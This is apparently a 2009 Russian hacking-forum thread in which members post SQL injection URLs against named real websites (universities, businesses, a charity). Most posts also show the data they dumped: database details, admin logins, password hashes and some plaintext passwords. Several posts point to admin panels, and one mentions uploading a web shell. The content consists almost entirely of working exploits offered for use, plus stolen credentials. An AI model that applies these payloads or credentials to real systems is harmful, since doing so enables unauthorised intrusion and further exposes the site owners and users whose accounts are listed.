SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    version 5.0.67-log
    user humblefool
     
    1 person likes this.
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    909
    Reputations:
    863
    _http://sideko.ru/index.php?categ=-74+union+select+111,concat_ws(0x3a,version(),database(),user()),3--&parent=61'&p=shop&navop=61'&area=1&sort=time_desc

    5.0.22:admin_sidb:admin_sidb@localhost

    инфу можно просмотреть в исходнике страници, в теге

    _http://sideko.ru/index.php?categ=-74+union+select+111,concat_ws(0x3a,name,uname,email,pass),3+from+kpro_user--&parent=61'&p=shop&navop=61'&area=1&sort=time_desc

    Администратор:Administrator:[email protected]:adc2db1bff610b3d8273936236558883
     
    _________________________
    #9282 winstrool, 14 May 2009
    Last edited: 14 May 2009
  3. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://smgroup.kz/index.php?opt=main&id=-1+union+ select+1,2,version() ,4,5 --

    5.0.67-community

    tables:news,users,admin,answers,menu

    http://smgroup.kz/index.php?opt=main&id=-1+unio n+select+1,2,group_concat(concat_ws(0x3a,login, parol)),4,5+fr om+admin--

    admin:pass
    admin:1234
     
    _________________________
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    909
    Reputations:
    863
    _http://www.restoran27.ru/?a=articles_full&id=-479+union+select+1,concat_ws(0x3a,version(),database(),user()),3+--
    5.0.77:restoran27:restoran27@localhost


    _http://www.restoran27.ru/?a=articles_full&id=-479+union+select+1,concat_ws(0x3a,login,pass),3+from+users+limit+0,1--
    Rem-x:38166fa5a6b227dd6b4a7cb415095520

    hash:260280
     
    _________________________
    #9284 winstrool, 14 May 2009
    Last edited: 14 May 2009
  5. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    [PR 3]
    Code:
    http://www.ultramarine.com.ua/info.php?id=-2+union+select+1,2,concat_ws(0x3a,version(),database(),user())
    4.1.22-log:ultramar:u_redact@localhost

    mssql-inj

    [PR 5]
    Code:
    http://www.sparkle.com.tw/product.asp?id=94+or+1=@@version--
    http://www.sparkle.com.tw/product.asp?id=94+or+1=(select+db_name())--
    http://www.sparkle.com.tw/product.asp?id=94+or+1=(select+system_user)--
    http://www.sparkle.com.tw/product.asp?id=94+or+1=(select+top+1+table_name+from+information_schema.tables)--
    [PR 4]
    Code:
    http://www.thinklogical.com/product.asp?ID=49+or+1=@@version--
    http://www.thinklogical.com/product.asp?ID=49+or+1=(select+db_name())--
    http://www.thinklogical.com/product.asp?ID=49+or+1=(select+system_user)--
    http://www.thinklogical.com/product.asp?ID=49+or+1=(select+top+1+table_name+from+information_schema.tables)--
     
    1 person likes this.
  6. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Еда пр4
    http://zone.missouri.edu/schedule.php?semester=Fall&year=-2008+union+select+1,2,3,4,5,concat_ws(0x3a3a,username,password,level),7,8,9,10,11,12,13,14+from+admin+/*+

    tmeans::pass::0
    zone_mentors::zonefolks::0

    http://zone.missouri.edu/Admin/
     
  7. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
     
  8. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    <<Бизнес портaл новосибирска>>
    Code:
    http://www.novosib.ru/market/offer.php?id=-2579+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),0,1,2,3,4,5--+
    4.1.22-log:novosib8_mamba:novosib8_sgv@localhost:portbld-freebsd6.1
     
  9. SecreT

    SecreT New Member

    Joined:
    1 Jan 2007
    Messages:
    3
    Likes Received:
    2
    Reputations:
    3
    http://www.organicavenue.com/products/news.php?id=-1/**/union/**/all/**/select/**/1,2,3,4,database(),user(),7,8,9,10 from products/*

    products
    denisemari@localhost


    http://www.hardwarehaber.com/haberbak.php?id=-1/**/union/**/all/**/select/**/1,2,3,4,5,database(),7,user(),version(),10,11,12,13,14,15,16/*

    hardwarehaber
    root@localhost
    5.0.32-Debian_7etch3-log



    http://www.aysu.de/haber.php?id=-1/**/union/**/all/**/select/**/1,2,3,4,5,database(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,user(),24,25,26,27,28,29/*

    dbaysu_1
    aysu@localhost
     
    #9289 SecreT, 14 May 2009
    Last edited by a moderator: 14 May 2009
    1 person likes this.
  10. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    Газета юрист.
    PR - 5


    user() - [email protected]
    database() - u74105_yur
    version() - 5.0.67-log
    @@version_compile_os - unknown-freebsd6.3

    Code:
    http://www.gazeta-yurist.ru/article.php?i=-397+union+select+version(),user(),3,4,5,6++--
     
  11. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Еда ПР6
    http://www.sierranevada.edu/pictures/photo/?aid=-191'+union+select+1,2,3,concat(username,char(58),password),5,6,7+from+usr+--+&index=2
    rstriffler:16908b0605f2645dfcb4c3a8d248cef3:80 - events
    CindyM:bccef78390596a8a3069b548b9c9214f:32 - incline
    SchuylerH:bccef78390596a8a3069b548b9c9214f:33 - incline
    .....................
     
    #9291 DezMond™, 14 May 2009
    Last edited: 15 May 2009
    1 person likes this.
  12. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Морские сражения

    http://navyfield.ru/index.php?page_id=1'+or+1=@@version--

    http://navyfield.ru/index.php?page_id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('phpbb_bots'))--

    Нету дампера mssql... вот и лениво:(

    ЗЫ: Чувствую,что это такой боян,что ппц...
     
  13. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.foodplus.ae/menu.php?id=1+union+select+1,concat_ws(0x3a,version(),datab ase(),u ser()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

    5.0.75-community-log:fanzplus_foodplus:fanzplus_foodp@localhost

    P.S что то я найти таблы не могу =\

    ---------------------------------------------------------------------------
    PR: 3

    http://www.ae-concrete.com/productchar.php?id=-1+union+select+concat_ws(0x3a,ve rsion(),database(),us er()),2--

    4.1.22-standard:db_aeconcrete:db_aeconcrete_97@localhost

    ----------------------------------------------------------------------------
    PR: 5

    http://www.go-green.ae/link.php?id=1+union +select+1,2,3,concat_ ws(0x3a,version(),database(),us er()),5,6,7/*

    4.1.21:gogreen:gogreen@localhost


    -----------------------------------------------------------------------------


    http://www.huda-shipping.ae/dynamic.php?id=-1+union+select+1,concat_ws(0x 3a,version(),databas e(),user()),3--

    5.0.67-community-log:huda_houda:huda_userhuda@localhost



    http://www.huda-shipping.ae/dynamic.php?id=-1+union+select+1,group_concat(concat_ws(0x3a,Admin_ID,Admin_Nam e,User _Name,P as sword,Email)),3+from+admin+limit+0,1--


    admin :
    1:Administrator:h uda123:huda_123:b [email protected]
     
    _________________________
    #9293 HAXTA4OK, 14 May 2009
    Last edited: 14 May 2009
  14. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.safariclub.ru/field.php?action=view&id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13--&status=1
    netsoft@localhost:netsoft_safari:5.0.45

    PR: 4
    тИЦ: 100


    Code:
    http://www.patrioty.info/field.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4--
    patrioty_patriot@localhost:patrioty_paintball:5.0.67-community

    Code:
    http://www.patrioty.info/field.php?id=-1+union+select+1,2,concat_ws(0x3a,id,login,password),4+from+users_cp--
    10:admin:dfer54

    http://patrioty.info/admin/ - админка. Шелл льётся =)
     
    #9294 mailbrush, 15 May 2009
    Last edited: 15 May 2009
  15. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    ПР6
    http://nccsdataweb.urban.org/faq/detail.php?linkID=-805+union+select+1,2,user,password,5,6,7,8,9,10,11,12,13+from+mysql.user+limit+1,1/*&category=9
    jdurnford::1030bc2d72167683

    http://www.avalonmicro.ca/products/index.php?Category=-6+union+select+table_name+from+information_schema.tables+--+
    user_registration

    http://www.amprofon.com.mx/noticias.php?id=-12+union+select+1,2,user,4+from+usuarios--
    apcmmexico
     
    #9295 DezMond™, 15 May 2009
    Last edited by a moderator: 15 May 2009
  16. Kimliksiz

    Kimliksiz Member

    Joined:
    7 May 2009
    Messages:
    31
    Likes Received:
    12
    Reputations:
    11

    Joomla com_akogallery

    http://www.kaminfeger.com/index.php?option=com_akogallery&Itemid=51index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-334455/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(0x3a,username)/**/from/**/mos_users/*

    admin c564660bacebedf0e02d3a409f29cd5b ??????



    http://www.wenatcheecares.org/user.php?id=-14+union+select+1,2,3,4,concat_ws(0x3a,user_nickna me,user_passwd),6,7,8,9,10,11+from+users

    Pastor Andrew:547d4e455674d06bd4d40475796f6944 pass : wencares

    http://www.wenatcheecares.org/login.php
     
    #9296 Kimliksiz, 15 May 2009
    Last edited by a moderator: 15 May 2009
  17. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://marbag.ae/index.php?id=-1'+union+select+1,concat_ws( 0x3a,version(),da tabase(),user()),3/*&lang=ru

    5.0.27:marbag:mbae-mysql@localhost

    ########################################

    http://www.aestockholm.se/ae.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databas e(),use r()),4,5/*

    5.0.45-log:bungy_se:bungy_se@[email protected]


    http://www.aestockholm.se/ae.php?id=-1+union+se lect+1,2,group_concat(concat_ws(0x3a,id,user,pass)),4,5+from+login+li mit+0,1/*

    admin:
    1:bungeelocos:pitepalt
    2:jp:pansarpung

    http://www.aestockholm.se/admin/
     
    _________________________
    #9297 HAXTA4OK, 15 May 2009
    Last edited: 15 May 2009
  18. vasyan

    vasyan New Member

    Joined:
    13 May 2009
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    http://www.gradschool.cornell.edu/index.php?p=-1+union+select+1,2,3,4,5,concat_ws(version(),database(),user()),7,8,9,10,11,12--
     
  19. Kimliksiz

    Kimliksiz Member

    Joined:
    7 May 2009
    Messages:
    31
    Likes Received:
    12
    Reputations:
    11
    http://www.digischool.nl/gcards/getnewsitem.php?newsid=1+union+select+1,2,concat(username,char(45),userpass),4,5+FROM+gc_cardusers--

    Fred Capel-240430a0ea35050f1dea47d2a13d3be4 ???

    admin panel

    http://www.digischool.nl/gcards/login.php
     
    #9299 Kimliksiz, 15 May 2009
    Last edited: 15 May 2009
  20. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://www.er.com.my/Content.php?id=1+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4/*

    4.1.22-standard-log:excellent_dat:excellent_root@localhost
     
    _________________________
Thread Status:
Not open for further replies.